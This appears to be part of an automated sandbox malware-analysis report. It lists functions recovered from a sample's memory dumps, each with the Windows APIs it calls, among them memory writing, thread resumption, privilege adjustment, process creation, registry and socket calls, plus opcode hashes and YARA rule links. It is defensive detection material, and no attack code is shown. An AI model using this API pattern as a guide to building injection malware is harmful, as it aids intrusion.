Uniqueness Score: -1.00%

Function 02CC54FA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 02CC5543

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 8f9256ca2a9e0195c49e0f4dcc591e7c6e32fd3325ad4d4f1b8c63c8d4e1bcca
Instruction ID: de69c64aec156be0371407ee21de1bc131968c9e95d6f6bd5482e1696dc21798
Opcode Fuzzy Hash: 8f9256ca2a9e0195c49e0f4dcc591e7c6e32fd3325ad4d4f1b8c63c8d4e1bcca
Instruction Fuzzy Hash: CA11A0715006049FDB20CF65D844B56FBE4EF08260F1884AEEE4A9B612D371E408CF71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC571A, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 02CC5758

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 7bee3af784d9f22095342324a28887253918b278a739fedcf53d22420860b70c
Instruction ID: ea2431d68eb98ed803718bb5283ffa0208a95c31f273b3e9b4807ef4e0829edf
Opcode Fuzzy Hash: 7bee3af784d9f22095342324a28887253918b278a739fedcf53d22420860b70c
Instruction Fuzzy Hash: F2018C31400600DFDB218F55D844B56FFA4EF48320F1884AEDE495B212D275A058DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 0101A09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0101A0D5

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: fcc33399125687e818a73615966e54007e132cbcd6df7662adea6f778090df8e
Instruction ID: 1b85b72fd1643dada7d40fc222fc1a8c67fe073cf69529540eb66afb3482991b
Opcode Fuzzy Hash: fcc33399125687e818a73615966e54007e132cbcd6df7662adea6f778090df8e
Instruction Fuzzy Hash: A901B131500680DFDB21DF59D944B56FFE4EF08324F08C4AAEE898B216D275A048CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC5672, Relevance: 1.5, APIs: 1, Instructions: 40nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 02CC56A7

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 95ba68c3d419d26bcd2fce41b07ea7ba98feecb1a5518771b47e12dbb3eae15c
Instruction ID: 873d839970e717d3a93f73f64e69ab5a66df3d6ddc69404246e409608ce00879
Opcode Fuzzy Hash: 95ba68c3d419d26bcd2fce41b07ea7ba98feecb1a5518771b47e12dbb3eae15c
Instruction Fuzzy Hash: A7018F318002449FDB10DF15D885B66FFA4EF44224F68C4AADE499F312D7B5A504CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC55CA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 02CC5605

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: d88e21d746872446c02e3048031a6e2c7d05fc6d2280a2c2c9526593c21bcc47
Instruction ID: 31e28e83f93df66b210b5aee03e0cfd275b350f44807f15c0914c585b534b240
Opcode Fuzzy Hash: d88e21d746872446c02e3048031a6e2c7d05fc6d2280a2c2c9526593c21bcc47
Instruction Fuzzy Hash: 60018B31400640DFDB209F15D884B66FFA0EF48320F18C09EDE4A5B612D3B6A418DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 02C91D9A, Relevance: .8, Instructions: 766COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6eb0d02bf56e9091da1eb90d5ff9f848dea34c6047aef13a1be632f76d16a8
Instruction ID: 499a77efb5ab1591d6134ef3078585044173c5d001add215c818e564f3848e7a
Opcode Fuzzy Hash: 4b6eb0d02bf56e9091da1eb90d5ff9f848dea34c6047aef13a1be632f76d16a8
Instruction Fuzzy Hash: CA82C074A012688FDB6ADF68C894BADB7B6BB89304F1044EAD509A7394CB355F81CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02C95758, Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 988e8e7946c137f6a45f352d3bc8dd8cb54f089c12f34215e6b8655bdeb76c09
Instruction ID: 2f1f7416fa3745dcaa591a6956c089f7ff8b1e328299f4e2886d3ab081c475f5
Opcode Fuzzy Hash: 988e8e7946c137f6a45f352d3bc8dd8cb54f089c12f34215e6b8655bdeb76c09
Instruction Fuzzy Hash: 2AA1F674E012188FDB68DFB9C990A9DBBB2BF89304F20946AD409B7394DB359D42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02C99CC0, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b0a4d95d5106cbfb34331024dd582f44b669561481124ef686e21a77e5ea55
Instruction ID: 017d351809f4d9138b2c2f2ec4bc3743f9e5b147972422367acde9190b20db92
Opcode Fuzzy Hash: 60b0a4d95d5106cbfb34331024dd582f44b669561481124ef686e21a77e5ea55
Instruction Fuzzy Hash: 7441D570D05258CFDB64DFA9C944BEDBBB2BF89304F1095AAC408B7250DB355A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02C95B70, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ccd480da3e74b330a7c30edd4c939aba89c80fbcff61d34fa7fcbdab18e5a80
Instruction ID: 25cce1865244accce764d9d68636e89b7cdb9f4cee46db1a618bb3ac0d61b56d
Opcode Fuzzy Hash: 0ccd480da3e74b330a7c30edd4c939aba89c80fbcff61d34fa7fcbdab18e5a80
Instruction Fuzzy Hash: 2B41F370D022588FDB54DFA9C854BEDBBF1BF89300F1494AAD408B7290DB355A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02C94B98, Relevance: 4.4, Strings: 3, Instructions: 636COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 02C95362
:@Dr, xrefs: 02C94D7A
:@Dr, xrefs: 02C951F1

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr$:@Dr
API String ID: 0-1395999109
Opcode ID: 3c095a1e4d8594b142c6a7b1bd56366da447bef39abe683eb62d5377d9d71d32
Instruction ID: 09e61482a1161d453638d2df7433b18997e4f566f4d8386d0da7de003646f5c4
Opcode Fuzzy Hash: 3c095a1e4d8594b142c6a7b1bd56366da447bef39abe683eb62d5377d9d71d32
Instruction Fuzzy Hash: E862AD34A02228CFDB25DF68C954BEDBBB2BB89304F5051E99A0967390DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02C94B87, Relevance: 2.9, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 02C94D7A
:@Dr, xrefs: 02C951F1

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr
API String ID: 0-1937172351
Opcode ID: 1d5ac05ba9dda42938290b4826990ba338a224fea329e1b0f2387f49e2694b1d
Instruction ID: 5e5e767a0732cc0b4afcc2b79566483080b4e9200c28a4be1020173e5f878c31
Opcode Fuzzy Hash: 1d5ac05ba9dda42938290b4826990ba338a224fea329e1b0f2387f49e2694b1d
Instruction Fuzzy Hash: CF12A034A02228CFEB25DF68C954BEDBBB2BB99304F5051E99A0967390DB355E81DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02C90898, Relevance: 2.7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

Strings

`5kr, xrefs: 02C90A20
:@Dr, xrefs: 02C909C8

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID: :@Dr$`5kr
API String ID: 0-2548079215
Opcode ID: 5bd4d904e0a46884236682ec0e9619790f99534aad4059a02441968350663545
Instruction ID: 73e7b13454f3b6257f58ebd83383d02fc8aae18f4a84d857c67b42c05f1c3ec0
Opcode Fuzzy Hash: 5bd4d904e0a46884236682ec0e9619790f99534aad4059a02441968350663545
Instruction Fuzzy Hash: 1F91D374E01218CFDB54DFA9C898BADBBF2BF89310F1080A9D509AB3A0DB759945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3CC0, Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 02CC3DEF

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 5c72f5bf9b436f8cb0d1b0ac5bf7678d15d31c1e9760b2f91aef524b6371d9a2
Instruction ID: e8493865878175fa9769382d59989b557ce50cf3d99ed14deacd577960a66124
Opcode Fuzzy Hash: 5c72f5bf9b436f8cb0d1b0ac5bf7678d15d31c1e9760b2f91aef524b6371d9a2
Instruction Fuzzy Hash: F451907100D3C06FE7238B609C54BA2BFB8AF47714F1A85DBE9849F1A3D2649909C772

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0465, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 02CC0575

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 03108694bb0a330f37939971295f2ad23a86e8661370847e3e3abd38fe3667c8
Instruction ID: c9791f510d40447fc0a4f913cfca1032a4f1f11a4b611f8a0f1d644d0531499c
Opcode Fuzzy Hash: 03108694bb0a330f37939971295f2ad23a86e8661370847e3e3abd38fe3667c8
Instruction Fuzzy Hash: 1441E571509380AFE712CB25DC45F92FFB8EF46210F1884DBEA849F293D265A508C771

Uniqueness

Uniqueness Score: -1.00%

Function 02CC31DC, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

getnameinfo.WS2_32(?,00000E2C), ref: 02CC32CD

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: getnameinfo
String ID:
API String ID: 1866240144-0
Opcode ID: e5d3d279f0d51ae49243fffc83059e51eb297da9a3da13c0eb041b5f4c36c5eb
Instruction ID: f55ef1c3a28d4b53209677a61a98ff1c367293620340e55cb5b617cfb6333f18
Opcode Fuzzy Hash: e5d3d279f0d51ae49243fffc83059e51eb297da9a3da13c0eb041b5f4c36c5eb
Instruction Fuzzy Hash: 36419C724083846FE7228B64DC50FA6BFB8EF47310F0984DBE9858B1A3D664A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 0101B729, Relevance: 1.6, APIs: 1, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0101B802

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 99346c5a3807bc904a090970bfb7d06c80546f94601f32f3658667c265e26677
Instruction ID: 2d4c3c7a004708eb23393797d53bf58490b43a1d54f33ce8e9e66b5ea416ea1d
Opcode Fuzzy Hash: 99346c5a3807bc904a090970bfb7d06c80546f94601f32f3658667c265e26677
Instruction Fuzzy Hash: 2C41496500E7C0AFD3139B358C65A61BFB4EF47620B0E81DBD9C48F5A3D2286919D7B2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC34BA, Relevance: 1.6, APIs: 1, Instructions: 114networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC35A1

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: cafe0c5eb50bb8d22f2795c23bd57e610fc5a4850a863e6f67859cd0db1620e7
Instruction ID: 3f8c6b6f70fb6e4a99ef035d2411d3b5137fa85ebdc6f4395c94c52717de45b0
Opcode Fuzzy Hash: cafe0c5eb50bb8d22f2795c23bd57e610fc5a4850a863e6f67859cd0db1620e7
Instruction Fuzzy Hash: A8412C7150D7C0AFD7238B209C54E52BFB8AF47214F1984DBE985CB1A3D229A949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0101B3E6, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

LsaLookupSids.ADVAPI32(?,00000E2C), ref: 0101B4BA

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: LookupSids
String ID:
API String ID: 2427636062-0
Opcode ID: 46bdbb8fcad189f0726aa486ed8c342b619598b6d0901bb45fd39419543fa595
Instruction ID: aa15d3d399622a7602e231fc985149f9317490181c82c1df47b738d2b0125733
Opcode Fuzzy Hash: 46bdbb8fcad189f0726aa486ed8c342b619598b6d0901bb45fd39419543fa595
Instruction Fuzzy Hash: 17419272504344AFE722CB68CC45FA6BBFCEF06710F08859BE984DB152D724A509CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC51F3, Relevance: 1.6, APIs: 1, Instructions: 110processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,00000E2C), ref: 02CC52E0

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 25d26da149d8ffb8fde4e41051460f6e16ed1b699581a38445cfa536c03c596f
Instruction ID: 34da24d53d5b356cf4e19f6783da8d221558d50a9c5229e9144661cd1df75fbb
Opcode Fuzzy Hash: 25d26da149d8ffb8fde4e41051460f6e16ed1b699581a38445cfa536c03c596f
Instruction Fuzzy Hash: C8316D72100300AFE7218F65CC45FA6BBECEF49710F14896AFA459A192D765FA49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101B913, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 0101B990

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 19796ebdd25d367d1220de5840826b291c8e190fde9405a38fd20feba1c74376
Instruction ID: 5e569de0b645edd57db47a591f8a65927bf599807ea233e2475df23caefcb60f
Opcode Fuzzy Hash: 19796ebdd25d367d1220de5840826b291c8e190fde9405a38fd20feba1c74376
Instruction Fuzzy Hash: 86417D724093809FDB228F65D884B56FFB4EF0A324F0884DADE858F263D375A559CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4A5E, Relevance: 1.6, APIs: 1, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC4B28

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 2c8bf7a7f777630935c5e630c91d44349dcb6b8238bb901b17bd0174834df557
Instruction ID: 5943ba1a52fbcf46abaf6497c76bc87bce040d138aa6d3bc7e0a5e1e082eda2b
Opcode Fuzzy Hash: 2c8bf7a7f777630935c5e630c91d44349dcb6b8238bb901b17bd0174834df557
Instruction Fuzzy Hash: A7316F7600D7C06FD7238B248C60B52BFB89F47214F1985DBE985DB1A3D2699849CB72

Uniqueness

Uniqueness Score: -1.00%

Function 02CC37B2, Relevance: 1.6, APIs: 1, Instructions: 105registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02CC3869

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8b9e94bef236cc6fa80d2494d30d344f5d0c160b8608f33882a8f46d05ebc48a
Instruction ID: 63417e71b9f3ccc3aa836dbad42b88639f39c8809bd69680f74a5c8455e73225
Opcode Fuzzy Hash: 8b9e94bef236cc6fa80d2494d30d344f5d0c160b8608f33882a8f46d05ebc48a
Instruction Fuzzy Hash: 3431D2B2404384AFE7228F25DC44FA7BFACEF46710F14899BF9819B152D364A509CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC21A4, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 02CC2282

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: cad577aa9b15758ded50d19e4e3366db8339fad8cea21af9e7816949b283f24a
Instruction ID: 4292a2bfd1e750cc941228a8ae1f08dc23fab859ec63f608aa28df9d4d756488
Opcode Fuzzy Hash: cad577aa9b15758ded50d19e4e3366db8339fad8cea21af9e7816949b283f24a
Instruction Fuzzy Hash: 7A316B7540E3C05FD7138B758C65AA1BFB4EF47614B0E40DBD8848F1A3E2686909CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02C99890, Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

>_Ir, xrefs: 02C998EB

Memory Dump Source

Source File: 0000000D.00000002.604211075.0000000002C90000.00000040.00000001.sdmp, Offset: 02C90000, based on PE: false

Similarity

API ID:
String ID: >_Ir
API String ID: 0-3386957151
Opcode ID: b63747c4eb571e5afe2f438507337e6f01e84b60741be3be2b4e508da149dd81
Instruction ID: 96d463f192f822f2856868f3b435fb0337fc99d0d1250aae63eb0643ef36b766
Opcode Fuzzy Hash: b63747c4eb571e5afe2f438507337e6f01e84b60741be3be2b4e508da149dd81
Instruction Fuzzy Hash: 95D11774E002099FDB14DFA9D884BEEBBF2FF88314F15806AE558AB2A1D7359941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101BBF3, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0101BCA9

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 41ba22ae6fa2cee3c82d46b7176c7feeea4d3c6e6d857ff3d9e1a56c1d6d81ba
Instruction ID: 95f2f42e9b8742534f45c2d6fbd3c0c24028274b007a99fb17041cd7b43c5a05
Opcode Fuzzy Hash: 41ba22ae6fa2cee3c82d46b7176c7feeea4d3c6e6d857ff3d9e1a56c1d6d81ba
Instruction Fuzzy Hash: CC318DB1504384AFE722CF25CC44F62BFF8EF46214F08849EE9848B252E375A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC5216, Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,00000E2C), ref: 02CC52E0

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dca4ee42ef4ffcd05803f82e704689e96ba0606fff671ba593724808e07dba4d
Instruction ID: 4b22a7e38846907b5d968684a791b288b0b9093994876f61b73038585a113bf9
Opcode Fuzzy Hash: dca4ee42ef4ffcd05803f82e704689e96ba0606fff671ba593724808e07dba4d
Instruction Fuzzy Hash: 79318C71100600AFEB319F65CC81FA6BBECEB48710F14896AFA459A191D7A1F604CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02CC332D, Relevance: 1.6, APIs: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 02CC33F6

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 237af36354c0ffb43367390e6afdaec827a91edfc9d1a06a91cde5384849ed34
Instruction ID: 1894ee476f3e66dbceb1e8cf1125b79f2e73a495fd5afb8d477057045bdfef51
Opcode Fuzzy Hash: 237af36354c0ffb43367390e6afdaec827a91edfc9d1a06a91cde5384849ed34
Instruction Fuzzy Hash: CB317C7150E3C05FD7038B758C61A66BFB49F47610F1E80CBD9848F2A3E624691AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0C18, Relevance: 1.6, APIs: 1, Instructions: 95timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 02CC0CB5

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: d919c6a9328b2b2be34747ee1a6530d68ee4a7e82463d4629c39feb763496b53
Instruction ID: 2de86a6a2af4dcdbbbe5fdf818931290601648faf9c5f63144ee5b7a3f718c89
Opcode Fuzzy Hash: d919c6a9328b2b2be34747ee1a6530d68ee4a7e82463d4629c39feb763496b53
Instruction Fuzzy Hash: 8531E771009780AFD7128F24DC45F96BFB8EF46310F14849BE9859F192D265A509C771

Uniqueness

Uniqueness Score: -1.00%

Function 02CC0D20, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E2C), ref: 02CC0DBF

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 878773a26fa4c5ecf488ac78d516dd65264d05bc2a0a0a8805bb4bee8c0d9a92
Instruction ID: 321bb43de40fd65513227e5f7dc482fc75d7713cf810f67bd91638ab1fccce5f
Opcode Fuzzy Hash: 878773a26fa4c5ecf488ac78d516dd65264d05bc2a0a0a8805bb4bee8c0d9a92
Instruction Fuzzy Hash: 8931B172404344AFEB228F65DC44F67BFACEF45320F0488AEF985DB152D224A5198B71

Uniqueness

Uniqueness Score: -1.00%

Function 0101AB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0101ABD5

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 809b82673178152d4c0820c2f6fe12b093a24e2dbeb2f92ea1ed988933d380f6
Instruction ID: d56ca0ec417123827f0795c069e59350426a6b3eba02230ec7cf97d47383060a
Opcode Fuzzy Hash: 809b82673178152d4c0820c2f6fe12b093a24e2dbeb2f92ea1ed988933d380f6
Instruction Fuzzy Hash: 7B31A272504384AFE7228B25CC45FA7BFECEF06710F08849BED819B152D264A449CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02CC4DC8, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,EC6B5014,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02CC4E68

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4d125096ce888829a223680057d2505fc937bcbbee4efe7e990589f76aa41d9f
Instruction ID: 76062f3fd18196f107ba8e7dcfe9d53249d6770b15e328a472448c835c5e9d36
Opcode Fuzzy Hash: 4d125096ce888829a223680057d2505fc937bcbbee4efe7e990589f76aa41d9f
Instruction Fuzzy Hash: A131787500E3C09FD7138B349C65692BFB4DF07224B0A80DBD9C18F5A3D2685949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02CC39B2, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02CC3A5E

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 869fc9dcf1b07bf7349bb8e724b27e9869ebac1156aa228efd83122fd89c6aa6
Instruction ID: 22e44ea432d22ee3b24acddfd8df8e977b315a9969f5ecedb770556c1acb6e6f
Opcode Fuzzy Hash: 869fc9dcf1b07bf7349bb8e724b27e9869ebac1156aa228efd83122fd89c6aa6
Instruction Fuzzy Hash: 8931C4B2509380AFE7229B64DC44F67BFB8EF46710F18849BFD809B253D220A509C771

Uniqueness

Uniqueness Score: -1.00%

Function 0101B426, Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

LsaLookupSids.ADVAPI32(?,00000E2C), ref: 0101B4BA

Memory Dump Source

Source File: 0000000D.00000002.601421498.000000000101A000.00000040.00000001.sdmp, Offset: 0101A000, based on PE: false

Similarity

API ID: LookupSids
String ID:
API String ID: 2427636062-0
Opcode ID: 35248dc09bb6cbd32dfb46f0b430fdace9cd77b3aeceb9d148d764a0da99fd91
Instruction ID: bc23cbabac701fa1a0e3caa336049f30dd3b4999bda85e3b014be3acb8f19636
Opcode Fuzzy Hash: 35248dc09bb6cbd32dfb46f0b430fdace9cd77b3aeceb9d148d764a0da99fd91
Instruction Fuzzy Hash: FB215E72500204AFE721DB69DC84FABBBECEF44710F14895BFA85DB241D764A5048BB5

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3236, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

getnameinfo.WS2_32(?,00000E2C), ref: 02CC32CD

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: getnameinfo
String ID:
API String ID: 1866240144-0
Opcode ID: f726726183792833dcc8a093c439cc635d24138fedc5434ff90eb332c5e6b7e7
Instruction ID: 3146653646b068df1624543cf24a3ad987407a8ba05a812d10071549caa77be7
Opcode Fuzzy Hash: f726726183792833dcc8a093c439cc635d24138fedc5434ff90eb332c5e6b7e7
Instruction Fuzzy Hash: 57218E72500244AFEB20DF65DC81FABBBACEF44310F14895AEA46CB241DB61E549CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC1231, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,?), ref: 02CC12D5

Memory Dump Source

Source File: 0000000D.00000002.604430971.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: accept
String ID:
API String ID: 3005279540-0
Opcode ID: 7e3c7f6952cccf039db41bf939e8766299840aedbfae2817bc8c7ff90277450f
Instruction ID: 76625e86444de45d639fdce1a13f6848bee2eff71ed4acd24db0e30f0a9c3b04
Opcode Fuzzy Hash: 7e3c7f6952cccf039db41bf939e8766299840aedbfae2817bc8c7ff90277450f
Instruction Fuzzy Hash: 2331A171509380AFE712CB25DC45F96FFE8EF46214F18849EE9849B253D375A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0101AC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,EC6B5014,00000000,00000000,00000000,00000000), ref: 0101ACD8

Memory Dump Source

